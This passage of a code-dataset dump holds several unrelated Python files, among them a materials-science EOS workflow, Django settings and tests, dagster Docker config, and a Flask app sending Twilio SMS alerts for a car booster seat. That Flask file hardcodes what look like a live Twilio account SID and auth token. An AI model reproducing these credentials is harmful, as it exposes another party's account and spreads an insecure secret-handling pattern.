3 points were successful (otherwise fit does not work)\n if len(etot)<3:\n return self.exit_codes.ERROR_NOT_ENOUGH_SUCCESSFUL_CALCS\n\n scalings = etot[:,0]\n rms = etot[:,-1]\n # convert to eV and per atom units\n etot = etot/len(scaled_struc.sites) # per atom values\n etot[:,1] = etot[:,1] * get_Ry2eV() # convert energy from Ry to eV\n volumes, energies = etot[:,2], etot[:,1]\n\n # do multiple fits to data\n self.report('INFO: output of fits:')\n self.report('{:18} {:8} {:7} {:7}'.format('fitfunc', 'v0', 'e0', 'B'))\n self.report('-----------------------------------------')\n fitnames = self.ctx.fitnames\n alldat = []\n fitdata = {}\n for fitfunc in fitnames:\n try:\n eos = EquationOfState(volumes, energies, eos=fitfunc)\n v0, e0, B = eos.fit()\n fitdata[fitfunc] = [v0, e0, B]\n alldat.append([v0, e0, B])\n self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format(fitfunc, v0, e0, B))\n except: # capture all errors and mark fit as unsuccessful\n self.ctx.warnings.append('fit unsuccessful for {} function'.format(fitfunc))\n if fitfunc == self.ctx.fitfunc_gs_out:\n self.ctx.successful = False\n alldat = array(alldat)\n self.report('-----------------------------------------')\n self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format('mean', mean(alldat[:,0]), mean(alldat[:,1]), mean(alldat[:,2])))\n self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format('std', std(alldat[:,0]), std(alldat[:,1]), std(alldat[:,2])))\n\n # store results in context\n self.ctx.volumes=volumes\n self.ctx.energies=energies\n self.ctx.scalings=scalings\n self.ctx.rms = rms\n self.ctx.fitdata=fitdata\n self.ctx.fit_mean_values={'':mean(alldat[:,0]), '':mean(alldat[:,1]), '':mean(alldat[:,2])}\n self.ctx.fit_std_values={'s_v0':std(alldat[:,0]), 's_e0':std(alldat[:,1]), 's_B':std(alldat[:,2])}\n\n\n def return_results(self):\n \"\"\"\n create output dictionary and run output node generation\n \"\"\"\n self.report('INFO: create output node')\n outdict = {}\n outdict['successful'] = self.ctx.successful\n outdict['warnings'] = self.ctx.warnings\n outdict['sub_workflow_uuids'] = self.ctx.sub_wf_ids\n outdict['nsteps_input'] = self.ctx.nsteps\n outdict['scale_range_input'] = self.ctx.scale_range\n outdict['scale_factors_all'] = self.ctx.scale_factors\n outdict['volumes'] = self.ctx.volumes\n outdict['energies'] = self.ctx.energies\n outdict['scalings'] = self.ctx.scalings\n outdict['rms'] = self.ctx.rms\n outdict['parameter_fits'] = self.ctx.fitdata\n outdict['fits_mean'] = self.ctx.fit_mean_values\n outdict['fits_std'] = self.ctx.fit_std_values\n outdict['formula'] = self.ctx.structure.get_formula()\n outdict['label'] = self.ctx.label\n if self.ctx.successful and self.ctx.return_gs_struc:\n # final result: scaling factor for equilibium\n v0, e0, B = self.ctx.fitdata.get(self.ctx.fitfunc_gs_out)\n scale_fac0 = v0/self.ctx.structure.get_cell_volume()*len(self.ctx.structure.sites)\n outdict['gs_scale_factor'] = scale_fac0\n outdict['gs_fitfunction'] = self.ctx.fitfunc_gs_out\n gs_structure = rescale(self.ctx.structure, Float(scale_fac0))\n if self.ctx.use_primitive_structure:\n tmpdict = get_primitive_structure(gs_structure, Bool(True))\n conv_structure, explicit_kpoints, parameters, gs_structure = tmpdict['conv_structure'], tmpdict['explicit_kpoints'], tmpdict['parameters'], tmpdict['primitive_structure']\n outdict['gs_kpoints_seekpath_params_uuid'] = parameters.uuid\n gs_structure.label = 'ground_state_structure_{}'.format(gs_structure.get_formula())\n gs_structure.description = 'Ground state structure of {} after running eos workflow. Uses {} fit.'.format(gs_structure.get_formula(), self.ctx.fitfunc_gs_out)\n outdict['gs_structure_uuid'] = gs_structure.uuid\n\n # create output nodes in dict with link names\n outnode = Dict(dict=outdict)\n outnode.store()\n outnodes = {'eos_results': outnode}\n if self.ctx.successful and self.ctx.return_gs_struc:\n outnodes['gs_structure'] = gs_structure\n if self.ctx.use_primitive_structure:\n outnodes['explicit_kpoints'] = explicit_kpoints\n outnodes['get_explicit_kpoints_path_parameters'] = parameters\n # set out nodes and corresponding link names\n for link_name, node in outnodes.items():\n self.out(link_name, node)\n\n\n### Helper functions and workfunctions ###\n\ndef rescale_no_wf(structure, scale):\n \"\"\"\n Rescales a crystal structure. DOES NOT keep the provanence in the database.\n\n :param structure, a StructureData node (pk, or uuid)\n :param scale, float scaling factor for the cell\n\n :returns: New StrcutureData node with rescalled structure, which is linked to input Structure\n and None if inp_structure was not a StructureData\n\n copied and modified from aiida_fleur.tools.StructureData_util\n \"\"\"\n\n the_ase = structure.get_ase()\n new_ase = the_ase.copy()\n new_ase.set_cell(the_ase.get_cell()*float(scale), scale_atoms=True)\n rescaled_structure = DataFactory('structure')(ase=new_ase)\n\n return rescaled_structure\n\n@calcfunction\ndef rescale(inp_structure, scale):\n \"\"\"\n Rescales a crystal structure. Keeps the provanance in the database.\n\n :param inp_structure, a StructureData node (pk, or uuid)\n :param scale, float scaling factor for the cell\n\n :returns: New StrcutureData node with rescalled structure, which is linked to input Structure\n and None if inp_structure was not a StructureData\n\n copied and modified from aiida_fleur.tools.StructureData_util\n \"\"\"\n\n return rescale_no_wf(inp_structure, scale)\n\n\n@calcfunction\ndef get_primitive_structure(structure, return_all):\n \"\"\"\n calls get_explicit_kpoints_path which gives primitive structure\n auxiliary workfunction to keep provenance\n \"\"\"\n from aiida.tools import get_explicit_kpoints_path\n output = get_explicit_kpoints_path(structure)\n conv_structure = output['conv_structure']\n explicit_kpoints = output['explicit_kpoints']\n parameters = output['parameters']\n primitive_structure = output['primitive_structure']\n if return_all:\n return {'conv_structure':conv_structure, 'explicit_kpoints':explicit_kpoints, 'parameters':parameters, 'primitive_structure':primitive_structure}\n else:\n return primitive_structure\n","sub_path":"aiida_kkr/workflows/eos.py","file_name":"eos.py","file_ext":"py","file_size_in_byte":25439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"502949984","text":"import pymel.core as pm\n\ndef get_matrix_along_axis(obj, axis=0, scale=10):\n '''Returns a transformation matrix for the position in worldspace along an \n axis of the specified transform. The scale param will multiply the normalized vector'''\n \n if not isinstance(obj, pm.nodetypes.Transform):\n pm.warning('The object needs to be of type Transform')\n return\n \n if axis < 0 or axis > 2 or not isinstance(axis, int):\n pm.warning('param axis needs to be an int in the range 0-2')\n return\n \n if not (isinstance(scale, float) or isinstance(scale, int)):\n pm.warning('scale needs to be a int or float')\n return\n \n # get the transformation matrix\n tm = pm.datatypes.TransformationMatrix(obj.getMatrix(ws=True))\n \n # get the dipslcement vector\n vec = pm.datatypes.Vector(tm[axis][0],tm[axis][1],tm[axis][2])\n \n # get the position\n pos = pm.datatypes.Vector(tm[3][0],tm[3][1],tm[3][2])\n \n # get the rotation matrix\n rot_matrix = pm.datatypes.TransformationMatrix(tm.asRotateMatrix())\n \n # add the translation\n rot_matrix.addTranslation(pos + (vec*scale), space='world')\n \n # visual debug\n pm.curve(d=1, p=[pos, pos + vec*scale])\n \n # apply the matrix\n #loc.setMatrix(rot_matrix)\n #loc.setTranslation(pos + x_axis*10)\n #loc.setMatrix(rot_matrix)\n \n return rot_matrix\n\n#obj = pm.PyNode('pCube1')\nobj = pm.ls(sl=True)[0]\nloc = pm.spaceLocator()\ntm = get_matrix_along_axis(obj, axis=1, scale=10)\nloc.setMatrix(tm)","sub_path":"t_matrix.py","file_name":"t_matrix.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565053110","text":"from dagster import Array, Field, Permissive, StringSource, check\nfrom docker_image import reference\n\nDOCKER_CONFIG_SCHEMA = {\n \"image\": Field(\n StringSource,\n is_required=False,\n description=\"The docker image to be used if the repository does not specify one.\",\n ),\n \"registry\": Field(\n {\n \"url\": Field(StringSource),\n \"username\": Field(StringSource),\n \"password\": Field(StringSource),\n },\n is_required=False,\n description=\"Information for using a non local/public docker registry\",\n ),\n \"env_vars\": Field(\n [str],\n is_required=False,\n description=\"The list of environment variables names to forward to the docker container\",\n ),\n \"network\": Field(\n StringSource,\n is_required=False,\n description=\"Name of the network to which to connect the launched container at creation time\",\n ),\n \"networks\": Field(\n Array(StringSource),\n is_required=False,\n description=\"Names of the networks to which to connect the launched container at creation time\",\n ),\n \"container_kwargs\": Field(\n Permissive(),\n is_required=False,\n description=\"key-value pairs that can be passed into containers.create. See \"\n \"https://docker-py.readthedocs.io/en/stable/containers.html for the full list \"\n \"of available options.\",\n ),\n}\n\n\ndef validate_docker_config(network, networks, container_kwargs):\n if network:\n check.invariant(not networks, \"cannot set both `network` and `networks`\")\n\n if container_kwargs:\n if \"image\" in container_kwargs:\n raise Exception(\n \"'image' cannot be used in 'container_kwargs'. Use the 'image' config key instead.\"\n )\n\n if \"environment\" in container_kwargs:\n raise Exception(\n \"'environment' cannot be used in 'container_kwargs'. Use the 'environment' config key instead.\"\n )\n\n if \"network\" in container_kwargs:\n raise Exception(\n \"'network' cannot be used in 'container_kwargs'. Use the 'network' config key instead.\"\n )\n\n\ndef validate_docker_image(docker_image):\n try:\n # validate that the docker image name is valid\n reference.Reference.parse(docker_image)\n except Exception as e:\n raise Exception(\n \"Docker image name {docker_image} is not correctly formatted\".format(\n docker_image=docker_image\n )\n ) from e\n","sub_path":"python_modules/libraries/dagster-docker/dagster_docker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280053180","text":"import math\n\n\ndef isprime(y):\n \"\"\"Return True if input is prime, return False if it is not.\"\"\"\n x = math.ceil(math.sqrt(y))\n z = 2\n if y <= 3:\n return True\n while z <= x:\n if y % z == 0:\n return False\n else:\n z += 1\n return True\n\n\ndef prdiv(a):\n \"\"\"Return the prime factorization of input, of form (base, exponent)\"\"\"\n answ = []\n count = 2\n while count <= a:\n exp = 0\n if isprime(count) is True:\n while a % count == 0:\n a = a // count\n exp += 1\n if a == 1:\n answ.append((count, exp))\n return answ\n if exp != 0:\n answ.append((count, exp))\n count += 1\n else:\n count += 1\n print(answ)\n\n\ndef prunder(max):\n \"\"\"Return all primes under a certain value in a list\"\"\"\n c = 0\n answ = []\n while c <= max:\n if isprime(c) is True:\n answ.append(c)\n c += 1\n else:\n c += 1\n return answ\n\n# Under implementation. Do not use\n\n\ndef b_prunder(number):\n import tqdm\n c = 5\n primes = [2, 3]\n\n for c in tqdm(range(1, number)):\n for prime in primes:\n if c % prime != 0:\n pass\n else:\n break\n else:\n primes.append(c)\n\n c += 2\n\n return primes\n # this works up to 200k. When trying to do it for 2000k, it stops working\n\n\nsum(prunder(2000000))\n\nprdiv(1236)\n","sub_path":"PythonCode/Project Euler/prtools.py","file_name":"prtools.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626337986","text":"import os\nfrom decouple import config, Csv\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nSECRET_KEY = config('SECRET_KEY')\n\nDEBUG = config('DEBUG', default=True, cast=bool)\n\n# pass list of email addresses\nADMINS = config('ADMINS', default=[], cast=lambda v: [tuple(['Admin', e]) for e in v.split(',')] if v else [])\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())\n\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'footballchief',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'corsheaders',\n 'django_filters',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nCORS_ORIGIN_WHITELIST = config('CORS_ORIGIN_WHITELIST', cast=Csv())\n\nROOT_URLCONF = 'urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': config('DB_ENGINE'),\n 'NAME': config('DB_NAME'),\n 'USER': config('DB_USER'),\n 'PASSWORD': config('DB_PASSWORD'),\n 'HOST': config('DB_HOST'),\n 'PORT': config('DB_PORT', cast=int),\n 'CONN_MAX_AGE': 600,\n }\n}\n\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n 'DEFAULT_RENDERER_CLASSES': (\n 'djangorestframework_camel_case.render.CamelCaseJSONRenderer',\n ),\n\n 'DEFAULT_PARSER_CLASSES': (\n 'djangorestframework_camel_case.parser.CamelCaseJSONParser',\n ),\n 'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)\n}\n\nAUTH_USER_MODEL = 'footballchief.User'\n\n# allow non-active users to log in. they won't show up in the rankings\nAUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.AllowAllUsersModelBackend']\n\n\nEMAIL_BACKEND = config('EMAIL_BACKEND')\nEMAIL_HOST = config('EMAIL_HOST', default=None)\nEMAIL_PORT = config('EMAIL_PORT', default=None)\nEMAIL_HOST_USER = config('EMAIL_HOST_USER', default=None)\nEMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD', default=None)\nEMAIL_USE_TLS = config('EMAIL_USE_TLS', default=None)\nDEFAULT_FROM_EMAIL = config('DEFAULT_FROM_EMAIL', default=None)\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n\nFRONTEND_URL = config('FRONTEND_URL')","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577994802","text":"from flask import render_template, request, session, redirect, url_for\nfrom flask_login import login_required\nfrom project.forms import AddContactForm\nfrom project import db\nfrom project.models import User\n\nfrom sqlalchemy import update\nimport os\nfrom twilio.rest import Client\nimport threading\nfrom project.tasks import alert, revoke\n#from celery.task.control import revoke\n\nfrom . import app\n\n#NEED = 0\n#USER = 0\n\n'''\n#Mahd's phone:\nACC_SID = \"ACefef234a7dcd3cb22413db1ecab742a5\"\nAUTH_TOKEN = \"4a6cd830f3a7b69ec5cae4fde76e34b9\"\nFROM = \"+18604312585\"\nBODY = \"YOUR BABY MIGHT BE IN DANGER! CHECK YOUR CAR!\"\n\n'''\n\n#Mahd's phone:\nACC_SID = \"ACefef234a7dcd3cb22413db1ecab742a5\"\nAUTH_TOKEN = \"4a6cd830f3a7b69ec5cae4fde76e34b9\"\nFROM = \"+18647546228\"\nBODY = \"YOUR BABY MIGHT BE IN DANGER! CHECK YOUR CAR!\"\n\n@app.route('/')\ndef index():\n\treturn render_template('landingpage.html')\n\n\n@app.route('/team')\ndef team():\n return render_template('team.html')\n\n@app.route('/info')\ndef info():\n return render_template('info.html')\n\n@app.route('/account', methods=['GET'])\n@login_required\ndef account():\n\tform = AddContactForm()\n\tuser = User.query.filter_by(id=session['user_id']).first()\n\tsession['user_id'] = user.id\n\treturn render_template('private.html', user=user, form=form)\n\n@app.route('/test')\n@login_required\ndef check():\n\tuser = User.query.filter_by(username=session['name']).first()\n\tuser.flag = 1\n\tdb.session.commit()\n\n@app.route('/private', methods=['GET','POST'])\n@login_required\ndef private():\n\t\n\treturn redirect(url_for('account'))\n\n@app.route('/add_contact/', methods=['POST'])\ndef add_contact(contact_num):\n\t# form = AddContactForm(request.form)\n\tprint(request.form)\n\tuser = User.query.filter_by(id=session['user_id']).first()\n\tif (contact_num == 1):\n\t\tuser.name1 = request.form['name1']\n\t\tuser.relation1 = request.form['relation1']\n\t\tuser.phone1 = request.form['phone1']\n\telif (contact_num==2):\n\t\tuser.name2 = request.form['name2']\n\t\tuser.relation2 = request.form['relation2']\n\t\tuser.phone2 = request.form['phone2']\n\telif (contact_num==3):\n\t\tuser.name3 = request.form['name3']\n\t\tuser.relation3 = request.form['relation3']\n\t\tuser.phone3 = request.form['phone3']\n\telse:\n\t\treturn redirect(url_for('account'))\n\tdb.session.commit()\n\t'''if request.method == 'POST':\n\t\tprint(form)'''\n\treturn redirect(url_for('account'))\n\t'''name=form.name.data\n\trelation = form.relation.data\n\tnumber= form.number.data'''\n\t'''user = User.query.filter_by(username=username).first()\n\tuser = User(name, relation, number)\n\tdb.session.add(user)\n\tdb.session.commit()\n\tlogin_user(user, remember=True)\n\tnext_page = request.args.get('next')\n\tif not next_page or url_parse(next_page).netloc != '':\n\t next_page = url_for('account')\n\treturn redirect(url_for('account'))'''\n\n\n\n\n@app.route('/booster_seat_alert/', methods=[\"GET\",\"POST\"])\ndef booster_seat_alert(booster_seat_id):\n\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\tif request.method == \"POST\":\n\t\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\t\tuser.flag = 1\n\t\tif user.task_id:\n\t\t\trevoke(user.task_id)\n\t\ttask = alert.delay(user.number, user.flag, user.phone1, user.phone2, user.phone3)\n\t\tprint(type(task.id))\n\t\tuser.task_id = str(task.id)\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('booster_seat_stop', booster_seat_id = booster_seat_id))\n\telse:\n\t\treturn render_template('sendmessage.html' ,booster_seat_id = booster_seat_id, user=user)\n\n\t\n\t##GET : show a button on a template which will send POST request for this booster\n\t## POST: set flag to 1 for the user this booster belongs to\n\n\n@app.route('/booster_seat_stop/', methods=[\"GET\",\"POST\"]) \ndef booster_seat_stop(booster_seat_id):\n\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\tif request.method == 'POST':\n\t\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\t\tuser.flag = 0\n\t\ttask = user.task_id\n\t\tprint('before ' + task)\n\t\trevoke(task)\n\t\tprint('revoked')\n\t\tuser.task_id = 0\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('booster_seat_alert', booster_seat_id=booster_seat_id))\t\n\telse:\n\t\treturn render_template('stopmessage.html',booster_seat_id=booster_seat_id, user = user)\n\n\t##GET : show a button on a template which will send POST request for this booster\n \t# POST: set flag to 0 for the user this booster belongs to\n\n","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574707046","text":"import logging\n\nfrom django.test import TestCase\n\nfrom bearing.parser import BearingParser\n\nlogger = logging.getLogger()\n\n\nclass RollingBearingTest(TestCase):\n\n def check_result(self, data):\n for item, result in data.items():\n parser = BearingParser.parse(item)\n self.assertEqual(parser.bearing_type, result['bearing_type'])\n self.assertEqual(parser.bearing_design, result['bearing_design'])\n self.assertEqual(parser.full_name, result['full_name'])\n print('.... OK')\n\n def test_simple(self):\n print('Running RollingBearingTest.test_simple_parser')\n data = {\n '112': {'bearing_type': '0', 'bearing_design': '00', 'full_name': '0000112'},\n '42308': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '0042308'},\n '3056201': {'bearing_type': '6', 'bearing_design': '05', 'full_name': '3056201'},\n }\n self.check_result(data)\n\n def test_prefix(self):\n print('Running RollingBearingTest.test_prefix')\n data = {\n '5-1200': {'bearing_type': '1', 'bearing_design': '00', 'full_name': '5-0001200'},\n '5-60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5- 60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5 -60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5 - 60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n }\n self.check_result(data)\n\n def test_suffix(self):\n print('Running RollingBearingTest.test_suffix')\n data = {\n '2318М': {'bearing_type': '2', 'bearing_design': '00', 'full_name': '0002318 М'},\n '2318 М': {'bearing_type': '2', 'bearing_design': '00', 'full_name': '0002318 М'},\n '46205Р': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '0046205 Р'},\n '46215 Л': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '0046215 Л'},\n }\n self.check_result(data)\n\n def test_complex(self):\n print('Running RollingBearingTest.test_complex')\n data = {\n '5-210 Р': {'bearing_type': '0', 'bearing_design': '00', 'full_name': '5-0000210 Р'},\n '5-46108Е5': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '5-0046108 Е5'},\n '6-42314 М1Ш1': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '6-0042314 М1Ш1'},\n '6 - 1046915 Д': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '6-1046915 Д'},\n '30 -42726Е2М': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '30-0042726 Е2М'},\n '30 - 42726Е2 М': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '30-0042726 Е2М'},\n '2В70-42609 ЛЗМ': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '2В70-0042609 ЛЗМ'},\n }\n self.check_result(data)\n","sub_path":"app/tests/test_rolling_bearings.py","file_name":"test_rolling_bearings.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"372061675","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as pd\n\npartition=0.8\n\ndata=pd.read_csv(\"./RawData.txt\")\n#data.drop(columns=\"date\",inplace=True,axis=1)\ndata=data.values\nlength=10*int(data.shape[0]*partition/10)\ntrainData=data[:length]\ntestData=data[length:]\n\ntrainInput=trainData[:,:-1]\ntrainInput=pd.DataFrame(trainInput)\ntrainInput=(trainInput-trainInput.mean())/trainInput.std()\ntrainInput=trainInput.values\ntrainLabel=trainData[:,-1]\n\ntestInput=testData[:,:-1]\ntestLabel=testData[:,-1]\ntestInput=pd.DataFrame(testInput)\ntestInput=(testInput-testInput.mean())/testInput.std()\ntestInput=testInput.values\n\nnp.savetxt(\"trainData.txt\",trainInput)\nnp.savetxt(\"testData.txt\",testInput)\nnp.savetxt(\"trainLabel.txt\",trainLabel)\nnp.savetxt(\"testLabel.txt\",testLabel)\n","sub_path":"python/MTSC/RNN/LabelExtraction.py","file_name":"LabelExtraction.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377250696","text":"from typing import List\n\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n res = []\n track = []\n\n def backtrack(s, track):\n if not s:\n res.append(track)\n\n for i in range(1, len(s) + 1):\n if s[:i] == s[:i][::-1]:\n backtrack(s[i:], track + [s[:i]])\n\n backtrack(s, track)\n\n return res\n","sub_path":"palindrome-partitioning/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13358077","text":"# Core Django imports.\nfrom django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.test import TestCase\nfrom django.urls import reverse\n\n# Third-party Django app imports.\nfrom model_mommy import mommy\n\n# Blog application imports.\nfrom blog.models.article_models import Article\nfrom blog.models.author_models import Profile\n\n\nclass AuthorsListViewTestCase(TestCase):\n \"\"\"\n Class to test the list of all authors\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Set up all the test using django client\n\n Model mommy creates three users and store them in a\n list called authors and you can access each of them using indices.\n\n In the view, it returns all the users and you can access every users\n profile details through the user's model.\n \"\"\"\n self.client = Client()\n self.authors = mommy.make(User, _quantity=3)\n\n def test_authors_list_view_status_code(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(response.status_code, 200)\n\n def test_authors_list_view_url_by_name(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(response.status_code, 200)\n\n def test_if_authors_list_view_uses_correct_template(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertTemplateUsed(response, 'blog/authors/authors_list.html')\n\n def test_if_authors_list_view_does_not_contain_incorrect_html(self):\n response = self.client.get('')\n self.assertNotContains(response, \"BONA\")\n\n def test_if_author_list_view_returns_the_right_number_of_authors(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(len(response.context_data['authors']), 3)\n\n # def test_if_author_list_view_returns_the_right_author_details(self):\n # response = self.client.get(reverse('blog:authors_list'))\n # self.assertEqual(response.context_data['authors'][0].profile,\n # self.authors[0].profile)\n # self.assertEqual(response.context_data['authors'][0].first_name,\n # self.authors[0].first_name)\n # self.assertEqual(response.context_data['authors'][0].last_name,\n # self.authors[0].last_name)\n # self.assertEqual(response.context_data['authors'][0].email,\n # self.authors[0].email)\n # self.assertEqual(response.context_data['authors'][0].username,\n # self.authors[0].username)\n # self.assertEqual(response.context_data['authors'][0].profile.image,\n # self.authors[0].profile.image)\n\n\nclass AuthorArticlesListViewTestCase(TestCase):\n \"\"\"\n Class to test a particular author's articles.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup all the tests using django client and model_mommy.\n \"\"\"\n self.client = Client()\n self.author = mommy.make(User)\n self.articles = mommy.make(Article, body=\"Test\", author=self.author, _quantity=5)\n\n def test_author_article_list_view_url_by_name(self):\n response = self.client.get(reverse('blog:author_articles',\n kwargs={\n 'username':\n self.author.username}\n )\n )\n self.assertEqual(response.status_code, 200)\n\n def test_if_author_article_list_view_uses_correct_template(self):\n response = self.client.get(reverse('blog:author_articles',\n kwargs={\n 'username':\n self.author.username}\n )\n )\n self.assertTemplateUsed(response, 'blog/authors/author_articles.html')\n\n # def test_if_author_article_list_view_returns_the_right_author_details(self):\n # response = self.client.get(reverse('blog:author_articles',\n # kwargs={\n # 'username':\n # self.author.username}\n # )\n # )\n #\n # self.assertEqual(response.context_data[\"articles\"][0].author.id,\n # self.author.id)\n # self.assertEqual(response.context_data[\"articles\"][0].author.first_name,\n # self.author.first_name)\n # self.assertEqual(response.context_data[\"articles\"][0].author.last_name,\n # self.author.last_name)\n # self.assertEqual(response.context_data[\"articles\"][0].author.email,\n # self.author.email)\n # self.assertEqual(response.context_data[\"articles\"][0].author.username,\n # self.author.username)\n # self.assertEqual(response.context_data[\"articles\"][0].author.profile.image,\n # self.author.profile.image)\n\n # def test_if_author_article_list_view_returns_the_right_article_details(self):\n # \"\"\"\n # This test checks if the view returns the right articles according to the\n # date they were published.\n #\n # In the setup, model mommy creates five articles and store\n # them in a list called articles. So the last article in the list will\n # be the first article in the list view since it was created last by model\n # mommy.\n # The list view orders articles according to the time they were published\n # so the last article in the articles list will be displayed first in the\n # view.\n # \"\"\"\n # response = self.client.get(reverse('blog:author_articles',\n # kwargs={\n # 'username':\n # self.author.username}\n # )\n # )\n #\n # self.assertEqual(response.context_data['articles'][0].author,\n # self.articles[4].author)\n # self.assertEqual(response.context_data['articles'][0].title,\n # self.articles[4].title)\n # self.assertEqual(response.context_data['articles'][0].slug,\n # self.articles[4].slug)\n # self.assertEqual(response.context_data['articles'][0].author,\n # self.articles[4].author)\n # self.assertEqual(response.context_data['articles'][0].image,\n # self.articles[4].image)\n # self.assertEqual(response.context_data['articles'][0].body,\n # self.articles[4].body)\n # self.assertEqual(response.context_data['articles'][0].date_published,\n # self.articles[4].date_published)\n # self.assertEqual(response.context_data['articles'][0].date_created,\n # self.articles[4].date_created)\n # self.assertEqual(response.context_data['articles'][0].status,\n # self.articles[4].status)","sub_path":"blog/tests/views/test_author_views.py","file_name":"test_author_views.py","file_ext":"py","file_size_in_byte":7408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217332711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 16 06:59:56 2021\r\n@author: dockt\r\n\"\"\"\r\nimport datetime\r\nimport sqlite3\r\nimport locale\r\nimport pytz\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom tkcalendar import Calendar\r\n\r\nroot = Tk()\r\nn1 = DoubleVar()\r\nn2 = DoubleVar()\r\nr = DoubleVar()\r\nconexion = sqlite3.connect(\"PythonEjercicio.db\")\r\ncursor = conexion.cursor()\r\nroot.title(\"PythonEjercicio\")\r\nroot.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\nroot.resizable(0,0)\r\ntexto = StringVar()\r\ntexto.set(\"\")\r\nnewTime = None\r\nnewDate = None\r\nresultadoAuto = None\r\nrun = False\r\ndef inicio():\r\n vncmd = (root.register(on_validateN),'%S', '%P')\r\n\r\n ConexionBDU()\r\n global mesg\r\n mesg = StringVar()\r\n mesg.set(\"Iniciar sesion\")\r\n \r\n global msg\r\n msg = Label(root,font=(\"Arial Bold\", 15))\r\n msg.grid(row=0)\r\n msg.config(textvariable=mesg, relief=\"ridge\", justify=\"center\")\r\n\r\n\r\n global 